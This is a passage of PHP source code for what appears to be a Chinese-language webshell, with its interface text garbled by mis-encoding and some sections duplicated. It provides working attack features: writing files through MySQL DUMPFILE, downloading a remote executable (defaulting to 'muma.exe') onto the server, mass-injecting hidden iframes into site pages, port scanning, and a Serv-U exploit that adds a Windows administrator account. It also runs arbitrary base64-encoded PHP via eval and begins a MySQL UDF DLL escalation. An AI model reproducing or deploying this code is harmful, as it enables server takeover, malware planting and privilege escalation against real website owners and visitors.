VALUES(CONVERT(0x\'.$filecode.\',CHAR));\';\r\n\t\t\tif(@mysql_query($query,$conn))\r\n\t\t\t{\r\n\t\t\t\t$query = \'SELECT cmd FROM a INTO DUMPFILE \\\'\'.$uppath.\'\\\';\';\r\n\t\t\t\t$MSG_BOX = @mysql_query($query,$conn) ? \'ϴļɹ\' : \'ϴļʧ\';\r\n\t\t\t}\r\n\t\t\telse $MSG_BOX = \'ʱʧ\';\r\n\t\t\t@mysql_query(\'Drop TABLE IF EXISTS a;\',$conn);\r\n\t\t}\r\n\t\telse $MSG_BOX = \'ʱʧ\';\r\n\t}\r\nprint<<<END\r\n<br><br>ϴ· <input type="text" name="uppath" value="{$uppath}" style="width:500px">\r\n<br><br>ѡļ <input type="file" name="upfile" style="width:500px;height:22px;">\r\n</div><div class="actall"><input type="submit" value="ϴ" style="width:80px;">\r\nEND;\r\n}\r\nelseif($o == \'d\')\r\n{\r\nprint<<<END\r\n<br><br><br>ļ <input type="text" name="downfile" value="{$downfile}" style="width:500px">\r\n</div><div class="actall"><input type="submit" value="" style="width:80px;">\r\nEND;\r\n}\r\nelse\r\n{\r\n\tif(!empty($_POST[\'msql\']))\r\n\t{\r\n\t\t$msql = $_POST[\'msql\'];\r\n\t\t$msql = base64_decode($msql);\r\n\t\tif($result = @mysql_query($msql,$conn))\r\n\t\t{\r\n\t\t\t$MSG_BOX = \'ִSQLɹ<br>\';\r\n\t\t\t$k = 0;\r\n\t\t\twhile($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}\r\n\t\t}\r\n\t\telse $MSG_BOX .= mysql_error();\r\n\t}\r\nprint<<<END\r\n<textarea name="msql" id="msql" style="width:700px;height:200px;">{$msql}</textarea></div>\r\n<div class="actall">\r\n<select onchange="return nFull(options[selectedIndex].value)">\r\n\t<option value="0" selected>ʾ汾</option>\r\n\t<option value="1">ļ</option>\r\n\t<option value="2">дļ</option>\r\n\t<option value="3"></option>\r\n</select>\r\n<input type="button" value="ִ" onclick="SubmitUrl();" style="width:80px;">\r\nEND;\r\n}\r\n\tif($MSG_BOX != \'\') echo \'</div><div class="actall">\'.$MSG_BOX.\'</div></center></form>\';\r\n\telse echo \'</div></center></form>\';\r\n\tbreak;\r\n\t\r\n    case "downloader":\r\n\t$Com_durl = isset($_POST[\'durl\']) ? $_POST[\'durl\'] : \'http://www.baidu.com/down/muma.exe\';\r\n\t$Com_dpath= isset($_POST[\'dpath\']) ? $_POST[\'dpath\'] : File_Str(dirname(myaddress).\'/muma.exe\');\r\nprint<<<END\r\n\t<form method="POST">\r\n    <div class="actall"> <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>\r\n    <div class="actall">ص <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>\r\n    <div class="actall"><input value="" type="submit" style="width:80px;"></div></form>\r\nEND;\r\n\tif((!empty($_POST[\'durl\'])) && (!empty($_POST[\'dpath\'])))\r\n\t{\r\n\t\techo \'<div class="actall">\';\r\n\t\t$contents = @file_get_contents($_POST[\'durl\']);\r\n\t\tif(!$contents) echo \'޷ȡҪص\';\r\n\t\telse echo File_Write($_POST[\'dpath\'],$contents,\'wb\') ? \'ļɹ\' : \'ļʧ\';\r\n\t\techo \'</div>\';\r\n\t}\r\n\tbreak;\r\n\r\n\tcase "issql":\r\n\tsession_start();\r\n  if($_POST[\'sqluser\'] && $_POST[\'sqlpass\']){\r\n    $_SESSION[\'sql_user\'] = $_POST[\'sqluser\'];\r\n    $_SESSION[\'sql_password\'] = $_POST[\'sqlpass\'];\r\n  }\r\n  if($_POST[\'sqlhost\']){$_SESSION[\'sql_host\'] = $_POST[\'sqlhost\'];}\r\n  else{$_SESSION[\'sql_host\'] = \'localhost\';}\r\n  if($_POST[\'sqlport\']){$_SESSION[\'sql_port\'] = $_POST[\'sqlport\'];}\r\n  else{$_SESSION[\'sql_port\'] = \'3306\';}\r\n  if($_SESSION[\'sql_user\'] && $_SESSION[\'sql_password\']){\r\n    if(!($sqlcon = @mysql_connect($_SESSION[\'sql_host\'].\':\'.$_SESSION[\'sql_port\'],$_SESSION[\'sql_user\'],$_SESSION[\'sql_password\']))){\r\n      unset($_SESSION[\'sql_user\'], $_SESSION[\'sql_password\'], $_SESSION[\'sql_host\'], $_SESSION[\'sql_port\']);\r\n      die(html_a(\'?eanver=sqlshell\',\'ʧ뷵\'));\r\n    }\r\n  }\r\n  else{\r\n    die(html_a(\'?eanver=sqlshell\',\'ʧ뷵\'));\r\n  }\r\n  $query = mysql_query("SHOW DATABASES",$sqlcon);\r\n  html_n(\'<tr><td>ݿб:\');\r\n  while($db = mysql_fetch_array($query)) {\r\n\t\thtml_a(\'?eanver=issql&db=\'.$db[\'Database\'],$db[\'Database\']);\r\n\t\techo \'&nbsp;&nbsp;\';\r\n\t}\r\n  html_n(\'</td></tr>\');\r\n  if($_GET[\'db\']){\r\n  \tcss_js("3");\r\n    mysql_select_db($_GET[\'db\'], $sqlcon);\r\n    html_n(\'<tr><td><form method="POST" name="DbForm"><textarea name="sql" COLS="80" ROWS="3">\'.$_POST[\'sql\'].\'</textarea><br>\');\r\n    html_select(array(0=>"--SQL﷨--",7=>"",8=>"ɾ",9=>"޸",10=>"ݱ",11=>"ɾݱ",12=>"ֶ",13=>"ɾֶ"),0,"onchange=\'return Full(options[selectedIndex].value)\'");\r\n    html_input("submit","doquery","ִ");\r\n    html_a("?eanver=issql&db=".$_GET[\'db\'],$_GET[\'db\']);\r\n    html_n(\'--->\');\r\n    html_a("?eanver=issql&db=".$_GET[\'db\']."&table=".$_GET[\'table\'],$_GET[\'table\']);\r\n    html_n(\'</form><br>\');\r\n  \tif(!empty($_POST[\'sql\'])){\r\n\t\t\tif (@mysql_query($_POST[\'sql\'],$sqlcon)) {\r\n\t\t\t\techo "ִSQLɹ";\r\n\t\t\t}else{\r\n\t\t\t\techo ": ".mysql_error();\r\n\t\t\t}\r\n  \t}\r\n    if($_GET[\'table\']){\r\n      html_n(\'<table border=1><tr>\');\r\n      $query = "SHOW COLUMNS FROM ".$_GET[\'table\'];\r\n      $result = mysql_query($query,$sqlcon);\r\n      $fields = array();\r\n      while($row = mysql_fetch_assoc($result)){\r\n        array_push($fields,$row[\'Field\']);\r\n        html_n(\'<td><font color=#FFFF44>\'.$row[\'Field\'].\'</font></td>\');\r\n      }\r\n      html_n(\'</tr><tr>\');\r\n      $result = mysql_query("SELECT * FROM ".$_GET[\'table\'],$sqlcon) or die(mysql_error());\r\n      while($text = @mysql_fetch_assoc($result)){\r\n      \tforeach($fields as $row){\r\n      \t\tif($text[$row] == "") $text[$row] = \'NULL\';\r\n      \t\thtml_n(\'<td>\'.$text[$row].\'</td>\');\r\n      \t}\r\n      \techo \'</tr>\';\r\n      }\r\n    }\r\n    else{\r\n      $query = "SHOW TABLES FROM " . $_GET[\'db\'];\r\n      $dat = mysql_query($query, $sqlcon) or die(mysql_error());\r\n      while ($row = mysql_fetch_row($dat)){\r\n        html_n("<tr><td><a href=\'?eanver=issql&db=".$_GET[\'db\']."&table=".$row[0]."\'>".$row[0]."</a></td></tr>");\r\n      }\r\n    }\r\n  }\r\n\tbreak;\r\n\t\r\n    case "downloader":\r\n\t$Com_durl = isset($_POST[\'durl\']) ? $_POST[\'durl\'] : \'http://www.baidu.com/down/muma.exe\';\r\n\t$Com_dpath= isset($_POST[\'dpath\']) ? $_POST[\'dpath\'] : File_Str(dirname(myaddress).\'/muma.exe\');\r\nprint<<<END\r\n\t<form method="POST">\r\n    <div class="actall"> <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>\r\n    <div class="actall">ص <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>\r\n    <div class="actall"><input value="" type="submit" style="width:80px;"></div></form>\r\nEND;\r\n\tif((!empty($_POST[\'durl\'])) && (!empty($_POST[\'dpath\'])))\r\n\t{\r\n\t\techo \'<div class="actall">\';\r\n\t\t$contents = @file_get_contents($_POST[\'durl\']);\r\n\t\tif(!$contents) echo \'޷ȡҪص\';\r\n\t\telse echo File_Write($_POST[\'dpath\'],$contents,\'wb\') ? \'ļɹ\' : \'ļʧ\';\r\n\t\techo \'</div>\';\r\n\t}\r\n\tbreak;\r\n\r\n\tcase "issql":\r\n\tsession_start();\r\n  if($_POST[\'sqluser\'] && $_POST[\'sqlpass\']){\r\n    $_SESSION[\'sql_user\'] = $_POST[\'sqluser\'];\r\n    $_SESSION[\'sql_password\'] = $_POST[\'sqlpass\'];\r\n  }\r\n  if($_POST[\'sqlhost\']){$_SESSION[\'sql_host\'] = $_POST[\'sqlhost\'];}\r\n  else{$_SESSION[\'sql_host\'] = \'localhost\';}\r\n  if($_POST[\'sqlport\']){$_SESSION[\'sql_port\'] = $_POST[\'sqlport\'];}\r\n  else{$_SESSION[\'sql_port\'] = \'3306\';}\r\n  if($_SESSION[\'sql_user\'] && $_SESSION[\'sql_password\']){\r\n    if(!($sqlcon = @mysql_connect($_SESSION[\'sql_host\'].\':\'.$_SESSION[\'sql_port\'],$_SESSION[\'sql_user\'],$_SESSION[\'sql_password\']))){\r\n      unset($_SESSION[\'sql_user\'], $_SESSION[\'sql_password\'], $_SESSION[\'sql_host\'], $_SESSION[\'sql_port\']);\r\n      die(html_a(\'?eanver=sqlshell\',\'ʧ뷵\'));\r\n    }\r\n  }\r\n  else{\r\n    die(html_a(\'?eanver=sqlshell\',\'ʧ뷵\'));\r\n  }\r\n  $query = mysql_query("SHOW DATABASES",$sqlcon);\r\n  html_n(\'<tr><td>ݿб:\');\r\n  while($db = mysql_fetch_array($query)) {\r\n\t\thtml_a(\'?eanver=issql&db=\'.$db[\'Database\'],$db[\'Database\']);\r\n\t\techo \'&nbsp;&nbsp;\';\r\n\t}\r\n  html_n(\'</td></tr>\');\r\n  if($_GET[\'db\']){\r\n  \tcss_js("3");\r\n    mysql_select_db($_GET[\'db\'], $sqlcon);\r\n    html_n(\'<tr><td><form method="POST" name="DbForm" id="DbForm"><textarea name="sql" id="sql" COLS="80" ROWS="3">\'.$_POST[\'sql\'].\'</textarea><br>\');\r\n    html_select(array(0=>"--SQL﷨--",7=>"",8=>"ɾ",9=>"޸",10=>"ݱ",11=>"ɾݱ",12=>"ֶ",13=>"ɾֶ"),0,"onchange=\'return Full(options[selectedIndex].value)\'");\r\n    html_input("submit","doquery","ִ");\r\n    html_a("?eanver=issql&db=".$_GET[\'db\'],$_GET[\'db\']);\r\n    html_n(\'--->\');\r\n    html_a("?eanver=issql&db=".$_GET[\'db\']."&table=".$_GET[\'table\'],$_GET[\'table\']);\r\n    html_n(\'</form><br>\');\r\n  \tif(!empty($_POST[\'sql\'])){\r\n\t\t\tif (@mysql_query($_POST[\'sql\'],$sqlcon)) {\r\n\t\t\t\techo "ִSQLɹ";\r\n\t\t\t}else{\r\n\t\t\t\techo ": ".mysql_error();\r\n\t\t\t}\r\n  \t}\r\n    if($_GET[\'table\']){\r\n      html_n(\'<table border=1><tr>\');\r\n      $query = "SHOW COLUMNS FROM ".$_GET[\'table\'];\r\n      $result = mysql_query($query,$sqlcon);\r\n      $fields = array();\r\n      while($row = mysql_fetch_assoc($result)){\r\n        array_push($fields,$row[\'Field\']);\r\n        html_n(\'<td><font color=#FFFF44>\'.$row[\'Field\'].\'</font></td>\');\r\n      }\r\n      html_n(\'</tr><tr>\');\r\n      $result = mysql_query("SELECT * FROM ".$_GET[\'table\'],$sqlcon) or die(mysql_error());\r\n      while($text = @mysql_fetch_assoc($result)){\r\n      \tforeach($fields as $row){\r\n      \t\tif($text[$row] == "") $text[$row] = \'NULL\';\r\n      \t\thtml_n(\'<td>\'.$text[$row].\'</td>\');\r\n      \t}\r\n      \techo \'</tr>\';\r\n      }\r\n    }\r\n    else{\r\n      $query = "SHOW TABLES FROM " . $_GET[\'db\'];\r\n      $dat = mysql_query($query, $sqlcon) or die(mysql_error());\r\n      while ($row = mysql_fetch_row($dat)){\r\n        html_n("<tr><td><a href=\'?eanver=issql&db=".$_GET[\'db\']."&table=".$row[0]."\'>".$row[0]."</a></td></tr>");\r\n      }\r\n    }\r\n  }\r\n\tbreak;\r\n\t\r\n\tcase "upfiles":\r\n\thtml_n(\'<tr><td>ϴļС: \'.@get_cfg_var(\'upload_max_filesize\').\'<form method="POST" enctype="multipart/form-data">\');\r\n\thtml_input("text","uppath",root_dir,"<br>ϴ·: ","51");\r\nprint<<<END\r\n<SCRIPT language="JavaScript">\r\nfunction addTank(){\r\nvar k=0;\r\n  k=k+1;\r\n  k=tank.rows.length;\r\n  newRow=document.all.tank.insertRow(-1)\r\n  <!--ɾѡ-->\r\n  newcell=newRow.insertCell()\r\n  newcell.innerHTML="<input name=\'tankNo\' type=\'checkbox\'> <input type=\'file\' name=\'upfile[]\' value=\'\' size=\'50\'>"\r\n}\r\n\r\nfunction delTank() {\r\n  if(tank.rows.length==1) return;\r\n  var checkit = false;\r\n  for (var i=0;i<document.all.tankNo.length;i++) {\r\n    if (document.all.tankNo[i].checked) {\r\n      checkit=true;\r\n      tank.deleteRow(i+1);\r\n      i--;\r\n    }\r\n  }\r\n  if (checkit) {\r\n  } else{\r\n    alert("ѡһҪɾĶ");\r\n    return false;\r\n  }\r\n}\r\n</SCRIPT>\r\n<br><br>\r\n<table cellSpacing=0 cellPadding=0 width="100%" border=0>       \r\n          <tr>\r\n            <td width="7%"><input class="button01" type="button"  onclick="addTank()" value="   " name="button2"/>\r\n            <input name="button3"  type="button" class="button01" onClick="delTank()" value="ɾ" />\r\n            </td>\r\n          </tr>\r\n</table>\r\n<table  id="tank" width="100%" border="0" cellpadding="1" cellspacing="1" >\r\n<tr><td>ѡҪϴļ</td></tr>\r\n<tr><td><input name=\'tankNo\' type=\'checkbox\'> <input type=\'file\' name=\'upfile[]\' value=\'\' size=\'50\'></td></tr>\r\n</table>\r\nEND;\r\n\thtml_n(\'<br><input type="submit" name="upfiles" value="ϴ" style="width:80px;"> <input type="button" value="" onclick="window.location=\\\'?eanver=main&path=\'.root_dir.\'\\\';" style="width:80px;">\');\r\n\tif($_POST[\'upfiles\']){\r\n\t\tforeach ($_FILES["upfile"]["error"] as $key => $error){\r\n\t\t\tif ($error == UPLOAD_ERR_OK){\r\n\t\t\t\t$tmp_name = $_FILES["upfile"]["tmp_name"][$key];\r\n\t\t\t\t$name = $_FILES["upfile"]["name"][$key];\r\n\t\t\t\t$uploadfile = str_path($_POST[\'uppath\'].\'/\'.$name);\r\n\t\t\t\t$upload = @copy($tmp_name,$uploadfile) ? $name.$msg[2] : @move_uploaded_file($tmp_name,$uploadfile) ? $name.$msg[2] : $name.$msg[3];\r\n\t\t\t\techo \'<br><br>\'.$upload;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\thtml_n(\'</form>\');\r\n\tbreak;\r\n\t\r\n\tcase "guama":\r\n\t$patht = isset($_POST[\'path\']) ? $_POST[\'path\'] : root_dir;\r\n\t$typet = isset($_POST[\'type\']) ? $_POST[\'type\'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";\r\n\t$codet = isset($_POST[\'code\']) ? $_POST[\'code\'] : "<iframe src=\\"http://localhost/eanver.htm\\" width=\\"1\\" height=\\"1\\"></iframe>";\r\n\thtml_n(\'<tr><td>ļ"|",Ҳָļ.<form method="POST"><br>\');\r\n\thtml_input("text","path",$patht,"·Χ","45");\r\n\thtml_input("checkbox","pass","","ʹĿ¼","",true);\r\n\thtml_input("text","type",$typet,"<br><br>ļ","60");\r\n\thtml_text("code","67","5",$codet);\r\n\thtml_n(\'<br><br>\');\r\n\thtml_radio("","","guama","qingma");\r\n\thtml_input("submit","passreturn","ʼ");\r\n\thtml_n(\'</td></tr></form>\');\r\n\tif(!empty($_POST[\'path\'])){\r\n\t\thtml_n(\'<tr><td>Ŀļ:<br><br>\');\r\n\t\tif(isset($_POST[\'pass\'])) $bool = true; else $bool = false;\r\n\t\tdo_passreturn($patht,$codet,$_POST[\'return\'],$bool,$typet);\r\n\t}\r\n\tbreak;\r\n\t\r\n\tcase "tihuan":\r\n\thtml_n(\'<tr><td>˹ܿ滻ļ,Сʹ.<br><br><form method="POST">\');\r\n\thtml_input("text","path",root_dir,"·Χ","45");\r\n\thtml_input("checkbox","pass","","ʹĿ¼","",true);\r\n\thtml_text("newcode","67","5",$_POST[\'newcode\']);\r\n\thtml_n(\'<br><br>滻Ϊ\');\r\n\thtml_text("oldcode","67","5",$_POST[\'oldcode\']);\r\n\thtml_input("submit","passreturn","滻","<br><br>");\r\n\thtml_n(\'</td></tr></form>\');\r\n\tif(!empty($_POST[\'path\'])){\r\n\t\thtml_n(\'<tr><td>Ŀļ:<br><br>\');\r\n\t\tif(isset($_POST[\'pass\'])) $bool = true; else $bool = false;\r\n\t\tdo_passreturn($_POST[\'path\'],$_POST[\'newcode\'],"tihuan",$bool,$_POST[\'oldcode\']);\r\n\t}\r\n\tbreak;\r\n\t\r\n\tcase "scanfile":\r\n\tcss_js("4");\r\n\thtml_n(\'<tr><td>˹ܿɺܷMYSQLûļ,Ȩ.<br>ļ̫ʱ,Ӱִٶ,ʹĿ¼.<form method="POST" name="sform"><br>\');\r\n\thtml_input("text","path",root_dir,"·","45");\r\n\thtml_input("checkbox","pass","","ʹĿ¼","",true);\r\n\thtml_input("text","code",$_POST[\'code\'],"<br><br>ؼ","40");\r\n\thtml_select(array("--MYSQLļ--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange=\'return Fulll(options[selectedIndex].value)\'");\r\n\thtml_n(\'<br><br>\');\r\n\thtml_radio("ļ","","scanfile","scancode");\r\n\thtml_input("submit","passreturn","");\r\n\thtml_n(\'</td></tr></form>\');\r\n\tif(!empty($_POST[\'path\'])){\r\n\t\thtml_n(\'<tr><td>ҵļ:<br><br>\');\r\n\t\tif(isset($_POST[\'pass\'])) $bool = true; else $bool = false;\r\n\t\tdo_passreturn($_POST[\'path\'],$_POST[\'code\'],$_POST[\'return\'],$bool);\r\n\t}\r\n\tbreak;\r\n\t\r\n\tcase "scanphp":\r\n\thtml_n(\'<tr><td>ԭǸ붨,鿴жϺٽɾ.<form method="POST"><br>\');\r\n\thtml_input("text","path",root_dir,"ҷΧ","40");\r\n\thtml_input("checkbox","pass","","ʹĿ¼<br><br>ű","",true);\r\n\thtml_select(array("php" => "PHP","asp" => "ASP","aspx" => "ASPX","jsp" => "JSP"));\r\n\thtml_input("submit","passreturn","","<br><br>");\r\n\thtml_n(\'</td></tr></form>\');\r\n\tif(!empty($_POST[\'path\'])){\r\n\t\thtml_n(\'<tr><td>ҵļ:<br><br>\');\r\n\t\tif(isset($_POST[\'pass\'])) $bool = true; else $bool = false;\r\n\t\tdo_passreturn($_POST[\'path\'],$_POST[\'class\'],"scanphp",$bool);\r\n\t}\r\n\tbreak;\r\n\t\r\n\tcase "port":\r\n\t$Port_ip = isset($_POST[\'ip\']) ? $_POST[\'ip\'] : \'127.0.0.1\';\r\n\t$Port_port = isset($_POST[\'port\']) ? $_POST[\'port\'] : \'21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631|2049|873\';\r\nprint<<<END\r\n<form method="POST">\r\n<div class="actall">ɨIP <input type="text" name="ip" value="{$Port_ip}" style="width:600px;"> </div>\r\n<div class="actall">˿ں <input type="text" name="port" value="{$Port_port}" style="width:597px;"></div>\r\n<div class="actall"><input type="submit" value="ɨ" style="width:80px;"></div>\r\n</form>\r\nEND;\r\n\tif((!empty($_POST[\'ip\'])) && (!empty($_POST[\'port\'])))\r\n\t{\r\n\t\techo \'<div class="actall">\';\r\n\t\t$ports = explode(\'|\', $_POST[\'port\']);\r\n\t\tfor($i = 0;$i < count($ports);$i++)\r\n\t\t{\r\n\t\t\t$fp = @fsockopen($_POST[\'ip\'],$ports[$i],$errno,$errstr,2);\r\n\t\t\techo $fp ? \'<font color="#FF0000">Ŷ˿ ---> \'.$ports[$i].\'</font><br>\' : \'رն˿ ---> \'.$ports[$i].\'<br>\';\r\n\t\t\tob_flush();\r\n\t\t\tflush();\r\n\t\t}\r\n\t\techo \'</div>\';\r\n\t}\r\n\tbreak;\r\n\t\r\n\r\n\tcase "getcode":\r\nif (isset($_POST[\'url\'])) {$proxycontents = @file_get_contents($_POST[\'url\']);echo ($proxycontents) ? $proxycontents : "<body bgcolor=\\"#F5F5F5\\" style=\\"font-size: 12px;\\"><center><br><p><b>ȡ URL ʧ</b></p></center></body>";exit;}\r\nprint<<<END\r\n<table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">\r\n <form method="POST" target="proxyframe">\r\n  <tr class="firstalt">\r\n\t<td align="center"><b>ߴ</b></td>\r\n  </tr>\r\n  <tr class="secondalt">\r\n\t<td align="center"  ><br><ul><li>ñܽʵּ򵥵 HTTP ,ʾʹ·ͼƬӼCSSʽ.</li><li>ñܿͨĿURL,֧ SQL Injection ̽ԼĳЩַ.</li><li>ñ URL,ĿµIP¼ : {$_SERVER[\'SERVER_NAME\']}</li></ul></td>\r\n  </tr>\r\n  <tr class="firstalt">\r\n\t<td align="center" height=40  >URL: <input name="url" value="about:blank" type="text"  class="input" size="100" >\r\n <input name="" value="" type="submit"  class="input" size="30" >\r\n</td>\r\n  </tr>\r\n  <tr class="secondalt">\r\n\t<td align="center"  ><iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="about:blank"></iframe></td>\r\n  </tr>\r\n</form></table>\r\nEND;\r\n\tbreak;\r\n\t\r\n\tcase "servu":\r\n\t$SUPass = isset($_POST[\'SUPass\']) ? $_POST[\'SUPass\'] : \'#l@$ak#.lk;0@P\';\r\nprint<<<END\r\n<div class="actall"><a href="?eanver=servu">[ִ]</a> <a href="?eanver=servu&o=adduser">[û]</a></div>\r\n<form method="POST">\r\n\t<div class="actall">ServU˿ <input name="SUPort" type="text" value="43958" style="width:300px"></div>\r\n\t<div class="actall">ServUû <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>\r\n\t<div class="actall">ServU <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>\r\nEND;\r\nif($_GET[\'o\'] == \'adduser\')\r\n{\r\nprint<<<END\r\n<div class="actall">ʺ <input name="user" type="text" value="envl" style="width:200px">\r\n <input name="password" type="text" value="envl" style="width:200px">\r\nĿ¼ <input name="part" type="text" value="C:\\\\\\\\" style="width:200px"></div>\r\nEND;\r\n}\r\nelse\r\n{\r\nprint<<<END\r\n<div class="actall">Ȩ <input name="SUCommand" type="text" value="net user envl envl /add & net localgroup administrators envl /add" style="width:600px"><br>\r\n<input name="user" type="hidden" value="envl">\r\n<input name="password" type="hidden" value="envl">\r\n<input name="part" type="hidden" value="C:\\\\\\\\"></div>\r\nEND;\r\n}\r\necho \'<div class="actall"><input type="submit" value="ִ" style="width:80px;"></div></form>\';\r\n\tif((!empty($_POST[\'SUPort\'])) && (!empty($_POST[\'SUUser\'])) && (!empty($_POST[\'SUPass\'])))\r\n\t{\r\n\t\techo \'<div class="actall">\';\r\n\t\t$sendbuf = "";\r\n\t\t$recvbuf = "";\r\n\t\t$domain  = "-SETDOMAIN\\r\\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\\r\\n"."-TZOEnable=0\\r\\n"." TZOKey=\\r\\n";\r\n\t\t$adduser = "-SETUSERSETUP\\r\\n"."-IP=0.0.0.0\\r\\n"."-PortNo=21\\r\\n"."-User=".$_POST[\'user\']."\\r\\n"."-Password=".$_POST[\'password\']."\\r\\n"."-HomeDir=c:\\\\\\r\\n"."-LoginMesFile=\\r\\n"."-Disable=0\\r\\n"."-RelPaths=1\\r\\n"."-NeedSecure=0\\r\\n"."-HideHidden=0\\r\\n"."-AlwaysAllowLogin=0\\r\\n"."-ChangePassword=0\\r\\n".\r\n\t\t\t\t\t\t\t "-QuotaEnable=0\\r\\n"."-MaxUsersLoginPerIP=-1\\r\\n"."-SpeedLimitUp=0\\r\\n"."-SpeedLimitDown=0\\r\\n"."-MaxNrUsers=-1\\r\\n"."-IdleTimeOut=600\\r\\n"."-SessionTimeOut=-1\\r\\n"."-Expire=0\\r\\n"."-RatioUp=1\\r\\n"."-RatioDown=1\\r\\n"."-RatiosCredit=0\\r\\n"."-QuotaCurrent=0\\r\\n"."-QuotaMaximum=0\\r\\n".\r\n\t\t\t\t\t\t\t "-Maintenance=None\\r\\n"."-PasswordType=Regular\\r\\n"."-Ratios=None\\r\\n"." Access=".$_POST[\'part\']."\\|RWAMELCDP\\r\\n";\r\n\t\t$deldomain = "-DELETEDOMAIN\\r\\n"."-IP=0.0.0.0\\r\\n"." PortNo=21\\r\\n";\r\n\t\t$sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10);\r\n\t\t$recvbuf = @fgets($sock, 1024);\r\n\t\techo "ݰ: $recvbuf <br>";\r\n\t\t$sendbuf = "USER ".$_POST["SUUser"]."\\r\\n";\r\n\t\t@fputs($sock, $sendbuf, strlen($sendbuf));\r\n\t\techo "ݰ: $sendbuf <br>";\r\n\t\t$recvbuf = @fgets($sock, 1024);\r\n\t\techo "ݰ: $recvbuf <br>";\r\n\t\t$sendbuf = "PASS ".$_POST["SUPass"]."\\r\\n";\r\n\t\t@fputs($sock, $sendbuf, strlen($sendbuf));\r\n\t\techo "ݰ: $sendbuf <br>";\r\n\t\t$recvbuf = @fgets($sock, 1024);\r\n\t\techo "ݰ: $recvbuf <br>";\r\n\t\t$sendbuf = "SITE MAINTENANCE\\r\\n";\r\n\t\t@fputs($sock, $sendbuf, strlen($sendbuf));\r\n\t\techo "ݰ: $sendbuf <br>";\r\n\t\t$recvbuf = @fgets($sock, 1024);\r\n\t\techo "ݰ: $recvbuf <br>";\r\n\t\t$sendbuf = $domain;\r\n\t\t@fputs($sock, $sendbuf, strlen($sendbuf));\r\n\t\techo "ݰ: $sendbuf <br>";\r\n\t\t$recvbuf = @fgets($sock, 1024);\r\n\t\techo "ݰ: $recvbuf <br>";\r\n\t\t$sendbuf = $adduser;\r\n\t\t@fputs($sock, $sendbuf, strlen($sendbuf));\r\n\t\techo "ݰ: $sendbuf <br>";\r\n\t\t$recvbuf = @fgets($sock, 1024);\r\n\t\techo "ݰ: $recvbuf <br>";\r\n\t\tif(!empty($_POST[\'SUCommand\']))\r\n\t\t{\r\n\t \t\t$exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10);\r\n\t \t\t$recvbuf = @fgets($exp, 1024);\r\n\t \t\techo "ݰ: $recvbuf <br>";\r\n\t \t\t$sendbuf = "USER ".$_POST[\'user\']."\\r\\n";\r\n\t \t\t@fputs($exp, $sendbuf, strlen($sendbuf));\r\n\t \t\techo "ݰ: $sendbuf <br>";\r\n\t \t\t$recvbuf = @fgets($exp, 1024);\r\n\t \t\techo "ݰ: $recvbuf <br>";\r\n\t \t\t$sendbuf = "PASS ".$_POST[\'password\']."\\r\\n";\r\n\t \t\t@fputs($exp, $sendbuf, strlen($sendbuf));\r\n\t \t\techo "ݰ: $sendbuf <br>";\r\n\t \t\t$recvbuf = @fgets($exp, 1024);\r\n\t \t\techo "ݰ: $recvbuf <br>";\r\n\t \t\t$sendbuf = "site exec ".$_POST["SUCommand"]."\\r\\n";\r\n\t \t\t@fputs($exp, $sendbuf, strlen($sendbuf));\r\n\t \t\techo "ݰ: site exec <font color=#006600>".$_POST["SUCommand"]."</font> <br>";\r\n\t \t\t$recvbuf = @fgets($exp, 1024);\r\n\t \t\techo "ݰ: $recvbuf <br>";\r\n\t \t\t$sendbuf = $deldomain;\r\n\t \t\t@fputs($sock, $sendbuf, strlen($sendbuf));\r\n\t \t\techo "ݰ: $sendbuf <br>";\r\n\t \t\t$recvbuf = @fgets($sock, 1024);\r\n\t \t\techo "ݰ: $recvbuf <br>";\r\n\t \t\t@fclose($exp);\r\n\t\t}\r\n\t\t@fclose($sock);\r\n\t\techo \'</div>\';\r\n\t}\r\n\tbreak;\r\n\t\r\n\tcase "phpcode":\r\n\t$phpcode = isset($_POST[\'phpcode\']) ? $_POST[\'phpcode\'] : "phpinfo();";\r\n    if($phpcode!=\'phpinfo();\')$phpcode = htmlspecialchars(base64_decode($phpcode));\r\n\techo \'<script language="javascript">\';\r\n    html_base();\r\n\techo \'function SubmitUrl(){\r\n\t\t\tdocument.getElementById(\\\'phpcode\\\').value = base64encode(document.getElementById(\\\'phpcode\\\').value);\r\n\t\t\tdocument.getElementById(\\\'sendcode\\\').submit();\r\n\t}</script><tr><td><form method="POST" id="sendcode" >д&lt;? ?&gt;ǩ,˹ŻʹBASE64ֹܴͣ뱻˾֪ССϸڣעɾͣ<br><br><textarea COLS="120" ROWS="35" name="phpcode" id="phpcode">\'.$phpcode.\'</textarea><br><br><input type="button" value="ִ" onclick="SubmitUrl();" style="width:80px;">\';\r\n\tif(!empty($_POST[\'phpcode\'])){\r\n\techo "<br><br>";\r\n    eval(stripslashes(base64_decode($_POST[\'phpcode\'])));\r\n\t}\r\n\thtml_n(\'</form>\');\r\n\tbreak;\r\n\r\n\tcase "myexp":\r\n\t$MSG_BOX = \'ȵDLL,ִ.MYSQLûΪrootȨ,·ܼDLLļ.\';\r\n\t$info = \'\';\r\n\t$mhost = \'localhost\'; $muser = \'root\'; $mport = \'3306\'; $mpass = \'\'; $mdata = \'mysql\'; $mpath = \'\'; $sqlcmd = \'ver\';\r\n\tif(isset($_POST[\'mhost\']) && isset($_POST[\'muser\']))\r\n\t{\r\n\t\t@$mysql64 = isset($_POST[\'mysql64\'])?true:false;if($mysql64){$mysql64=\'checked\';$BH=\'BH64.dll\';}else{$BH=\'BH.dll\';} $mhost = $_POST[\'mhost\']; $muser = $_POST[\'muser\']; $mpass = $_POST[\'mpass\']; $mdata = $_POST[\'mdata\']; $mport = 